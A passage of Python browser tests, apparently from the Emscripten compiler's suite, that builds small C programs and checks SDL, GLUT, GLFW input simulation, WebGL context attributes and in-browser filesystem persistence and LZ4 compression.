shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
run_process([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad);
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {antialias: true});
var attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {depth: true});
var attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {stencil: true});
var attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
var canvas = document.createElement('canvas');
var context = canvas.getContext('experimental-webgl', {alpha: true});
var attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
@unittest.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
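# Multi-stage test: the -DFIRST build preloads moar.txt and persists the secret (file_db.cpp stores it
# browser-side, presumably in IndexedDB); the later builds have no matching preload and must read the
# stored secret back, even when a different moar.txt is preloaded over it.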
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
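# Two-phase test: the -DFIRST build writes state into IDBFS and syncs it out; the second build syncs it
# back in and verifies the same secret survives.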
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'EXIT_RUNTIME=1']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
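# plant a fixed marker byte in the otherwise-random data (presumably verified on the C side after decompression)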
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc: -s LZ4=1 tells emcc to have the file packager emit LZ4-compressed data
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
